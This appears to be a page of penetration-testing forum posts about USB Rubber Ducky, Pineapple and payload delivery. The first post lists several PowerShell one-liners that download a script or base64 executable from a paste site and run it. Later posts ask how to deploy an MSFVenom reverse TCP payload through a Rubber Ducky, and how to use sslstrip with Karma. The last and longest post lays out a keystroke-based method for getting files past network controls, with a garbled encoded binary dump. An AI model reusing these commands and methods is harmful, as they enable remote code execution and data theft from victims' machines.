Search the Community

Hi This is my first question here hope someone can help I have converted puty.exe to putty.vbs and also I have also tried convert the exe to base64 Im trying to download (both vbs and base64 exe) it but Im not being able to succeed the vbs is on "https://www.codepile.net/raw/rjzpdEKZ.vbs" but https://www.codepile.net/raw/rjzpdEKZ works too I have tried 1 - IEX (new-object net.webclient).downloadstring("https://www.codepile.net/raw/rjzpdEKZ") 2 - Invoke-Expression -Command $([string]([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((Invoke-WebRequest -Uri https://www.codepile.net/raw/rjzpdEKZ).content)))) 3 - & ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((Invoke-WebRequest -Uri "https://www.codepile.net/raw/rjzpdEKZ" | Select-Object -ExpandProperty Content)))) 4 - (New-Object System.Net.WebClient).DownloadFile("https://www.codepile.net/raw/rjzpdEKZ","putty.vbs");(New-Object -com Shell.Application).ShellExecute("putty.vbs"); 4 - (New-Object System.Net.WebClient).DownloadFile("https://www.codepile.net/raw/rjzpdEKZ","foo.vbs");(New-Object -com Shell.Application).ShellExecute("foo.vbs"); because the program used to create the vbs file writes a foo.txt file What I might be doing wrong? How can I run it from powershell and a command line? Thanks

Can someone tell me what I have to make so I can read the output of my decoding? That would be cool.......;-P

Hi.......i have a problem, hope somebody can help me! Ok,....... I have created a Reverse TCP DNS payload with MSFVenom...... Now i want to execute this File with plugging in the USB Rubber Ducky! How i got to do this? Do i have to convert my Payload with Base64? And if yes, how i could do this? Please help me!

I've done some searching, but most everything that comes up is for the Mark IV and installing sslstrip. I haven't seen a post that specifically covers "sslstrip is not running ..." I've enabled sslstrip and once I click refresh (due to it not working) it states "sslstrip is not running..." but shows that it's still enabled. If you X out of the window and go to the home screen, it shows it's still enabled, but if you go back into sslstrip its disabled. I tried resetting to the defaults using the dip switches, reinstalled sslstrip and it seems like it works if I don't enable Karma first, but once I enabled Karma it was all over. Is this a known issue that my search fu didn't find, or am I doing something wrong?

This is a cross post of sorts: https://forums.hak5.org/index.php?/topic/31831-super-devious-exfiltration/?hl=logger I'm making the contention that if a keylogger had enough memory, that it could log a binary file (base64 or hex encoded first) and exfiltrate it without the network or needing a Flashdrive/Firewire (other)connection.Be it document, db etc... It is a bit of inception, the binary to base64 script would need to be written to the computer first, then pipe the target binary (document/db...) through that script. That script could pause, or wait for the keylogger to say "go", and then using native functions perhpas (like Sendkeys) or some other KB emulation, and the keylogger would then, eventually have the converted binary. It could be a binary that gets written by the RD to the computer, we'll call it kb.exe, and it executes and lt pipes the target file/binary into base64 and then the kb.exe would "type" the converted file for the keylogger to pick up. The RubberDucky function of getting files/scripts onto a computer is done, how about the reverse? Getting (target)files converted into keystrokes and recording those back into the RD or I suppose a second hardware keylogger if RD can't be modified to listen on the bus. It's not a typical use case, and the network or USB drive are quick and easy for networks that aren't very locked down, but on others, this would be the way to do it. If it's been done I aplogize, I can't seem to find anyone suggesting it the way i am. I also understand that it might not be very quick way to get files out of a network, but I don't know, it could be... Memory of course being one of the most significant issues. Compression in the script (upx? 7z?) against the binary first might help. Just throwing it out there. -rich

I've noticed if you use the OnScreeKeyboard (osk.exe for windows) that each key that is pressed on that KB seems to register with the physical keyboard, like the two are working on a parrallel line, each can see what the other is doing. Could the rubberducky sniff/record keystrokes, or could a keystroke logger, and you could base64 or hex encode binaries without the need for USB drive, Network or Wifi? The RD might have to first write a keyboarding exe/binary to the HDD first, then type/echo binary.exe through the keyboarding program, then sniff. Maybe it's been done? Perhaps ducky is always listening for some arbitrary BOF and EOF sequence and can "record" until EOF nineninesinarow (BOF) 4D5A90`v```!```$$``B8```````40```````````````````````````````````80```0E1FBA0E`B409CD21B8^[CD21546869732070726Fb72P6D20YP6E6E6F%2062652072756E20696E20&4F53206D6FR652E0D0D0A~```````_u``[^v`*7Ds52````````E0`Tv>^'15`B0v``=```D0!`A07F#``E0!``90#```40``=```'``!```^```!````````A0#``=``````v`````20``=````=``=``````=````````````90#`D8```````````````````````````````````````````````````````````94S#`k```````````````````````````````````````````````````55_58i`````D0!``=```````'``````````````80``E055_5831`````B0v``E0!``Kv``'``````````````40``E055_58j`````=```90#``'```AEv`````````````40``C0332EiL`55_58210D090E0AxE31DF3C9c20BB@58#`.fv``1A#`490E`62kv`2AA36D5C2327F3A4A1]1De;70.7BD576E3)e07E5FCC755CAB691W(d&SVCEQk5959D8}0A1FE911AAC3'E3$1ACF9946B2.A2F7,fC8Y705670143319o49EAEA71139A^71Hs90dABb5B4F620DBCB24375EEA8$F2&C0^SUCDDC7ED25DD8,wFCD8FDF1w2A*Lz3Fq}826FDAA768c~3Cr28F4A691C7138F22B21D562698A6910C31F4d42A5^9A`5E77EA42s91C32AB9)/nC6$09bCAA8=8DK0AA9B5CD91rA3F4@6D41QA958'54CD7By95^)FE 12 6E719AdE15DF8A1XF085CE25CEC0P1585FED2YDF:3C75D47D3111AD2540252ED9DB%68F222E9E12A8A*YBFC2D8#UD2C09EDFut4BC5E1l_2C29555D35/43a0E7Eo:0AqCE2765710A)c-7EEACB6BtF3EDEE.c65CB52C92FDF8596233EF1F3,85TD1F3@6831ADC25E7B72D6>/BCC0B65C59D5F6F3221F40X,:BB7Ea5AE3zA97B6828SZ2ECCB5C9B06858C0C81C54A7540DE3u3CA5_8A%F7g0D517EE9)+7E-yF3A6oi8D54T623151EDd1AR^9DCAm71BC1D5E342ACCE0A7E92CFC20 GB5AEZA0Nh}9111CB8AD2A73FjDAC26DC5d960D221AAD12D5C2B626+=E1B972AE46A1W0CXC9A8S7BO5615B1BC?98F0AE12gC6H$90Q9A211CC0:}51I`0D5AAEt etc... eighteightsinarow (EOF) RD types a keyboarding binary to the HDD, types a decode script, runs against the base64 and turns it into kb.exe again. The EXE can accept other base64 input piped into it, and it can buffer and slow down the pipe to a rate the RD can handle. Inception duck. I was reading about the Exfiltrator, but when I found out it just uses/comes with a USB 4G flash drive, I was all "lame... I'd keylog a file myself and get the files that way". So I'm going to go buy the Delux now :) I hope some one can code a small keystroke maker or there is another way to echo base64/hex on to the KB bus to record. Might have to be small files only, but they can have some good info in them too. EDIT It could be scriptable... windows has "sendkeys", so maybe that could work. The kb.exe could actually do the base64 converion of a binary (or other data)to then be captured by a keylogger or RD itself. -rich